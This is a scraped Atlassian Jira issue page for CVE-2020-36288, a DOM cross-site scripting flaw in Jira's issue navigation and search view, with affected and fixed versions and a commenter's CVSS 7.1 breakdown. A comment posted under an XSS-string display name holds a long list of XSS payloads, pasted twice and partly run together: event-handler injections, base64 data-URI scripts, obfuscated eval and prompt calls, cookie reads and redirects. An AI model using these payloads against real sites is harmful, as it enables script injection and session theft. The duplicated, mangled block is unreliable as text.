[%22Third] DOM XSS in the issue navigation & search view via parameter pollution - CVE-2020-36288 - Create and track feature requests for Atlassian products.

Type: Public Security Vulnerability
Resolution: Fixed
Priority: Low
Fix Version/s: 8.13.4, 8.5.12, 8.15.1
Affects Version/s: 8.14.0
Component/s: None
Labels:

CVSS Score:
7.1
CVSS Severity:
High
CVE ID:
CVE-2020-36288

The issue navigation & search view in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before version 8.13.4, and from version 8.14.0 before version 8.15.1 allows remote attackers to inject arbitrary HTML or JavaScript via a DOM Cross-Site Scripting (XSS) vulnerability caused by parameter pollution.

Affected versions:

version < 8.5.12
8.6.0 ≤ version < 8.13.4
8.14.0 ≤ version < 8.15.1

Fixed versions:

8.5.12
8.13.4
8.15.1

Atlassian would like to credit Peter af Geijerstam for reporting this issue.

Form Name

"><svg/onload=alert(111)> added a comment - 10/Jul/2021 3:33 AM

<AuDiO/*/oNLoaDStaRt='(_=//confirm/*/(1))'/src><!--x
<mArquee onStart=[~[onmouseleave(([[(prompt(1))]]))]] ]
<img src="/" =_=" title="onerror='/**/prompt(1)'">
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a/onmousemove=prompt(1)//>xss
<object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>
<svg+onload=eval(location.hash.substr(1))>#prompt(1)
<details/open/ontoggle=confirm('XSS')>
</script><svg><script>prompt(1)/'
<svg/onload=location=`javas``cript:ale``rt%2``81%2``9`;//
<svg </onload ="1> (=prompt,(1)) "">
<svg 1=""onload=prompt(1)>
<output name="jAvAsCriPt:// \u0061ler&#116(1)" onclick="eval(name)">X</output>
<iframe srcdoc="<img src=x:x onerror=prompt(23)>" />
<button onmousemove="javascript:prompt(1)">xss
<BoDy%0AOnpaGeshoW=+window.prompt(1)
<a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="
<isindex type=image src=1 onerror=prompt(1)>
<script>a=eval;b=prompt;a(b(/ 1/.source));</script>'">
<!'/!"/Unable to render embedded object: File (\'/\"/--) not found.><Input/Type=Text AutoFocus */; OnFocus=(confirm)(1) //>
<style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
jaVasCript://`/\`/'/"//(/ */oNcliCk=prompt() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/-!>\x3csVg/<sVg/oNloAd=prompt()//>\x3e
<embed src=/x//prompt(1)><base href="javascript:\
\u003csvg/onload=prompt`1`\u003e
\<svg/onload=prompt`1`\>
<article xmlns ="urn:img src=x onerror=xss()//" >xss
i{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t(d\oc\u\me\nt\.c\o\o\kie)\'\s\rc\=\'eeeeeee\'\20\>

{ <img / src = \ 'dfdfd \' // onerror = \ 'prompt (document.cookie) \ '> <img/src=q onerror='new Function`al\ert\`OPENBUGBOUNTY\``'> <Html Onmouseover=(prompt)(1) // <a href="javascript:prompt(document.domain)">Click Here</a> <script/src=//google.com/complete/search?client=chrome%26jsonp=prompt(1);> <script>alert(1)</script> <img src=1 onerror=confirm(1)> %26%23x003c%3Bimg%20src%3D1%20onerror%3Dprompt(1)%26%23x003e%3B%0A x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E <x+oncut=y=prompt,y`1`>xss <svG x=">" onload=(co\u006efirm)``> <script/xss~~~>;prompt(1);</script/X~~~> <VideO/**/OnerroR=~prompt("1")+/SrC> <video/poster/onerror=prompt(1)> <sVG/xss/OnLoaD+="window['confirm']+(1)"> <img x/src=x /onerror="x-\u0063onfirm(1)"> <VidEo/oNLoaDStaRt=confirm(1)+/src> <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))> <p/%0Aonmouseover%0A=%0Aconfirm(1)>xss <span/onmouseover=confirm(1)>xss <iframe/name="javascript:confirm(1);"onload="while(1)\{eval(name);}

">
<svg/onload=window.onerror=prompt;throw/XSS/;//
<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src>
<InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>xss
<img src="x:prompt" onerror="eval(src%2b'(1)')">
<img/src=xss%0A/**/onerror=eval('al'%2b'ert(1)')>
<img/alt=1 onerror=eval(src) src=x:prompt(alt) >
<isindex/*/alt=1+src=xss:window['prompt']/*/(alt)+type=image+onerror=while(true){eval(src)}>
<input type="text" name="foo" value=""autofocus/onfocus=prompt(1)//">
<math href="javascript:prompt(1)">CLICKME
<var onmouseover="prompt(1)">xss</var>
<h1/onmouseover='prompt(1)'>xss
<object data="javascript:prompt(1)">
<--'<script>window.confirm(1)</script> --!>
<div onmouseover=prompt("1")>xss
<img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');>
<plaintext/onmousemove=prompt(1)>xss
<marquee/onstart=prompt(1)>xss
<embed src=javascript:prompt(1)>
<select autofocus onfocus=prompt(1)>
<textarea autofocus onfocus=prompt(1)>
<keygen autofocus onfocus=prompt(1)>
<div/onmouseover='prompt(1)'>xss
<svg/onload=document.location.href='https://google.com'>
<audio src=x onerror=confirm("1")>
<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/>
<img%09onerror=prompt(1) src=a>
<i onclick=prompt(1)>Click here</i>
<img src=<b onerror=prompt('xss');>
<img src="x:? title=" onerror=prompt(1)//">
<img src="x:gif" onerror="eval('al'%2b'ert(/xss/)')">
<img src="x:gif" onerror="window['al\u0065rt'] (/'xss'/)"></img>
<a onmouseover%3D"prompt(1)">xss
<script/%00%00v%00%00>prompt(/xss/)</script>
<svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>
<script>$=1,prompt($)</script>
<svg•onload=prompt(1)>
<video onerror=prompt(1337) </poster>
<input onfocus=prompt(1337) </autofocus>[link dzdz|javascript:prompt()]mail@example.com

"><svg/onload=alert(111)> added a comment - 10/Jul/2021 3:33 AM <AuDiO/* /oNLoaDStaRt='(_=/ /confirm/ */(1))'/src>ipt>alert(1)</script> <img src=1 onerror=confirm(1)> %26%23x003c%3Bimg%20src%3D1%20onerror%3Dprompt(1)%26%23x003e%3B%0A x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E <x+oncut=y=prompt,y`1`>xss <svG x=">" onload=(co\u006efirm)``> <script/xss~~~>;prompt(1);</script/X~~~> <VideO/**/OnerroR=~prompt("1")+/SrC> <video/poster/onerror=prompt(1)> <sVG/xss/OnLoaD+="window['confirm']+(1)"> <img x/src=x /onerror="x-\u0063onfirm(1)"> <VidEo/oNLoaDStaRt=confirm(1)+/src> <video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))> <p/%0Aonmouseover%0A=%0Aconfirm(1)>xss <span/onmouseover=confirm(1)>xss <iframe/name="javascript:confirm(1);"onload="while(1)\{eval(name);} "> <svg/onload=window.onerror=prompt;throw/XSS/;// <object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=' /src> <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>xss <img src="x:prompt" onerror="eval(src%2b'(1)')"> <img/src=xss%0A/**/onerror=eval('al'%2b'ert(1)')> <img/alt=1 onerror=eval(src) src=x:prompt(alt) > <isindex/* /alt=1+src=xss:window ['prompt'] / */(alt)+type=image+onerror=while(true){eval(src)}> <input type="text" name="foo" value=""autofocus/onfocus=prompt(1)//"> <math href="javascript:prompt(1)">CLICKME <var onmouseover="prompt(1)">xss</var> <h1/onmouseover='prompt(1)'>xss <object data="javascript:prompt(1)"> <--'<script>window.confirm(1)</script> --!> <div onmouseover=prompt("1")>xss <img src=x onerror=window.open('data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=');> <plaintext/onmousemove=prompt(1)>xss <marquee/onstart=prompt(1)>xss <embed src=javascript:prompt(1)> <select autofocus onfocus=prompt(1)> <textarea autofocus onfocus=prompt(1)> <keygen autofocus onfocus=prompt(1)> <div/onmouseover='prompt(1)'>xss <svg/onload=document.location.href='https://google.com'> <audio src=x onerror=confirm("1")> <iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4="/> <img%09onerror=prompt(1) src=a> <i onclick=prompt(1)>Click here</i> <img src=<b onerror=prompt('xss');> <img src="x:? title=" onerror=prompt(1)//"> <img src="x:gif" onerror="eval('al'%2b'ert(/xss/)')"> <img src="x:gif" onerror="window ['al\u0065rt'] (/'xss'/)"></img> <a onmouseover%3D"prompt(1)">xss <script/%00%00v%00%00>prompt(/xss/)</script> <svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='> <script>$=1,prompt($)</script> <svg•onload=prompt(1)> <video onerror=prompt(1337) </poster> <input onfocus=prompt(1337) </autofocus> [link dzdz|javascript:prompt()] mail@example.com

David Black added a comment - 14/Apr/2021 7:02 AM - edited

This is an independent assessment and you should evaluate its applicability to your own IT environment.

CVSS v3 score: 7.1 => High severity

Exploitability Metrics

Attack Vector	Network
Attack Complexity	Low
Privileges Required	None
User Interaction	Required

Scope Metric

Scope	Unchanged

Impact Metrics

Confidentiality	High
Integrity	Low
Availability	None

https://asecurityteam.bitbucket.io/cvss_v3/#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

David Black added a comment - 14/Apr/2021 7:02 AM - edited This is an independent assessment and you should evaluate its applicability to your own IT environment. CVSS v3 score: 7.1 => High severity Exploitability Metrics Attack Vector Network Attack Complexity Low Privileges Required None User Interaction Required Scope Metric Scope Unchanged Impact Metrics Confidentiality High Integrity Low Availability None https://asecurityteam.bitbucket.io/cvss_v3/#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Details

Description

Attachments

Forms

Activity

[JRASERVER-72115] DOM XSS in the issue navigation & search view via parameter pollution - CVE-2020-36288

Collapse comment: "><svg/onload=alert(111)> added a comment - 10/Jul/2021 3:33 AM

Expand comment: "><svg/onload=alert(111)> added a comment - 10/Jul/2021 3:33 AM

Collapse comment: David Black added a comment - 14/Apr/2021 7:02 AM, Edited by David Black - 14/Apr/2021 7:13 AM

Expand comment: David Black added a comment - 14/Apr/2021 7:02 AM, Edited by David Black - 14/Apr/2021 7:13 AM

People

Dates